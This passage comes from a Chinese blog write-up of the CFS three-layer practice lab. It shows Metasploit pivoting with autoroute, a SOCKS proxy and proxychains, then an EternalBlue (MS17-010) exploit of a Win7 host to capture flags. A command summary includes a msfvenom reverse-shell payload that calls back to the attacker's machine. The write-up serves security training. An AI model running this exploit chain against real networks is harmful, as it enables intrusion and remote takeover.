<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\70.png" alt></p>
<h4 id="msf代理配置"><a href="#msf代理配置" class="headerlink" title="msf代理配置"></a>msf代理配置</h4><p>重复拿centos的shell的操作，继续给他创建一个33段的路由，配置代理</p>
<p>run autoroute -s 192.168.33.0/24</p>
<p>run autoroute -p</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\73.png" alt></p>
<p>开启msf的代理模块：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">background</span><br><span class="line">use auxiliary/server/socks_proxy</span><br><span class="line">set srvport 5555</span><br><span class="line">set version 4a</span><br><span class="line">run</span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\74.png" alt></p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\75.png" alt></p>
<p>修改配置文件：</p>
<p>vi /etc/proxychains4.conf</p>
<p>192.168.11.129 5555</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\77.png" alt></p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\76.png" alt></p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\83.png" alt></p>
<h4 id="获取主机权限-1"><a href="#获取主机权限-1" class="headerlink" title="获取主机权限"></a>获取主机权限</h4><p>新开页面，可以使用msf自带的一些tcp扫描模块或者nmap都可以，注意这里的msf开启时也需要走刚创建的那个代理 ，探测到445端口开放，又是win7系统，自然想到永恒之蓝漏洞（ms17-010），这里直接使用msf自带的永恒之蓝攻击</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">sudo su</span><br><span class="line">proxychains msfconsole</span><br><span class="line">search ms17-010</span><br><span class="line">use 1</span><br><span class="line">set payload windows/x64/meterpreter/bind_tcp</span><br><span class="line">set rhost 192.168.33.33</span><br><span class="line">run</span><br></pre></td></tr></table></figure>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\78.png" alt></p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\79.png" alt></p>
<p> <img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\81.png" alt></p>
<p>出现乱码</p>
<p><img src="/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/blog/source\_posts\cfs靶场\82.png" alt></p>
<p>得到最后的flag，至此靶场打穿，成功通关 </p>
<h5 id="flag10-12"><a href="#flag10-12" class="headerlink" title="flag10-12"></a>flag10-12</h5><p>flag{saDd12fEsef}</p>
<p>flag{2wAdK32Lsd}</p>
<p>flag{ASf12asf2sd}</p>
<h5 id="flag13"><a href="#flag13" class="headerlink" title="flag13"></a>flag13</h5><p>事件日志的注册表中</p>
<h2 id="命令汇总"><a href="#命令汇总" class="headerlink" title="命令汇总"></a>命令汇总</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">sudo su</span><br><span class="line">msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.11.129 LPORT=4444 -f elf&gt;1.elf</span><br><span class="line">msfconsole</span><br><span class="line">use exploit/multi/handler</span><br><span class="line">set payload linux/x64/meterpreter/reverse_tcp</span><br><span class="line">set lhost 192.168.11.129</span><br><span class="line">set lport 4444</span><br><span class="line">run</span><br><span class="line">run autoroute -s 192.168.22.0/24</span><br><span class="line">run autoroute -p</span><br><span class="line">background</span><br><span class="line">use auxiliary/server/socks_proxy</span><br><span class="line">set srvport 2222</span><br><span class="line">set version 4a</span><br><span class="line">run</span><br><span class="line">vi /etc/proxychains4.conf</span><br><span class="line">proxychains nmap -sT -Pn 192.168.22.129 -p 80</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">sudo su</span><br><span class="line">proxychains msfconsole</span><br><span class="line">use exploit/multi/handler</span><br><span class="line">set payload linux/x64/meterpreter/bind_tcp</span><br><span class="line">set rhost 192.168.22.129</span><br><span class="line">set lport 3333</span><br><span class="line">run</span><br><span class="line">run autoroute -s 192.168.33.0/24</span><br><span class="line">run autoroute -p</span><br><span class="line">background</span><br><span class="line">use auxiliary/server/socks_proxy</span><br><span class="line">set srvport 5555</span><br><span class="line">set version 4a</span><br><span class="line">run</span><br><span class="line">vi /etc/proxychains4.conf</span><br><span class="line">proxychains nmap -sT -Pn 192.168.33.33 -p 445</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">sudo su</span><br><span class="line">proxychains msfconsole</span><br><span class="line">search ms17-010</span><br><span class="line">use 1</span><br><span class="line">set payload windows/x64/meterpreter/bind_tcp</span><br><span class="line">set rhost 192.168.33.33</span><br><span class="line">run</span><br><span class="line">shell</span><br><span class="line">chcp 65001</span><br><span class="line">net user</span><br><span class="line">cd /</span><br><span class="line">dir /S /B *flag*</span><br><span class="line">type C:\Users\Administrator\Desktop\flag.txt</span><br><span class="line">type C:\Windows\System32\config\flag.txt</span><br></pre></td></tr></table></figure>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2023/09/17/SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime" title="Update time"></i>
              2023-09-18 08:34:52
            </span>
            
          </div>
          <div class="post-foot-prev">
            
              <a href="/2023/09/24/%E5%85%A5%E4%BE%B5%E6%A3%80%E6%B5%8B%E8%AE%BE%E5%A4%87/" target="_self">
                <span>Next</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#CFS%E4%B8%89%E5%B1%82%E9%9D%B6%E6%9C%BA"><span class="toc-text">CFS三层靶机</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B8%97%E9%80%8F%E6%B5%81%E7%A8%8B"><span class="toc-text">渗透流程</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="toc-text">环境搭建</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%85%8D%E7%BD%AE%E7%BD%91%E5%8D%A1"><span class="toc-text">配置网卡</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9D%E5%A1%94%E5%90%8E%E5%8F%B0%E9%85%8D%E7%BD%AE"><span class="toc-text">宝塔后台配置</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#centos"><span class="toc-text">centos</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ubuntu"><span class="toc-text">ubuntu</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#win7"><span class="toc-text">win7</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E8%AE%B0%E5%BD%95"><span class="toc-text">信息记录</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#kali"><span class="toc-text">kali</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#centos-1"><span class="toc-text">centos</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ubuntu-1"><span class="toc-text">ubuntu</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#win7-1"><span class="toc-text">win7</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B8%97%E9%80%8F%E5%AE%9E%E6%93%8D"><span class="toc-text">渗透实操</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%93%E7%A9%BFcentos"><span class="toc-text">打穿centos</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96webshell"><span class="toc-text">获取webshell</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#flag1"><span class="toc-text">flag1</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#flag2"><span class="toc-text">flag2</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#flag3"><span class="toc-text">flag3</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E4%B8%BB%E6%9C%BA%E6%9D%83%E9%99%90"><span class="toc-text">获取主机权限</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%93%E7%A9%BFubuntu"><span class="toc-text">打穿ubuntu</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-1"><span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E5%88%86%E6%9E%90"><span class="toc-text">信息分析</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#msf%E7%9A%84%E4%BB%A3%E7%90%86%E9%85%8D%E7%BD%AE"><span class="toc-text">msf的代理配置</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%8B%BF%E4%B8%8BUbuntu-webshell"><span class="toc-text">拿下Ubuntu webshell</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#flag4"><span class="toc-text">flag4</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%BE%97ubuntu%E4%B8%BB%E6%9C%BA%E6%9D%83%E9%99%90"><span class="toc-text">获得ubuntu主机权限</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#flag5"><span class="toc-text">flag5</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#flag6"><span class="toc-text">flag6</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#flag7"><span class="toc-text">flag7</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#flag8"><span class="toc-text">flag8</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#flag9"><span class="toc-text">flag9</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%93%E7%A9%BFwin7"><span class="toc-text">打穿win7</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86-2"><span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#msf%E4%BB%A3%E7%90%86%E9%85%8D%E7%BD%AE"><span class="toc-text">msf代理配置</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E4%B8%BB%E6%9C%BA%E6%9D%83%E9%99%90-1"><span class="toc-text">获取主机权限</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#flag10-12"><span class="toc-text">flag10-12</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#flag13"><span class="toc-text">flag13</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%91%BD%E4%BB%A4%E6%B1%87%E6%80%BB"><span class="toc-text">命令汇总</span></a></li></ol></li></ol>
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        <div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
        <li>
          <a title="email" href="">
            <i class="iconfont icon-envelope"></i>
          </a>
        </li>
      
        <li>
          <a title="facebook" href="">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        </li>
      
        <li>
          <a title="twitter" href="">
            <i class="iconfont icon-twitter"></i>
          </a>
        </li>
      
        <li>
          <a title="wechat" href="">
            <i class="iconfont icon-wechat"></i>
          </a>
        </li>
      
        <li>
          <a title="weibo" href="">
            <i class="iconfont icon-weibo"></i>
          </a>
        </li>
      
        <li>
          <a title="rss" href="/atom.xml">
            <i class="iconfont icon-rss"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © Oranges 2021</a>
        
    </div>
  
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="Search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>No result<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The search.xml file was not found, please refer to：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>The request failed, Try to refresh the page or try again later.<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + cfs%E9%9D%B6%E5%9C%BA + '&url=' + http%3A%2F%2Fyy-ll.github.io%2F2023%2F09%2F18%2Fcfs%25E9%259D%25B6%25E5%259C%25BA%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://yy-ll.github.io/2023/09/18/cfs%E9%9D%B6%E5%9C%BA/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  <script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
</body>
</html>
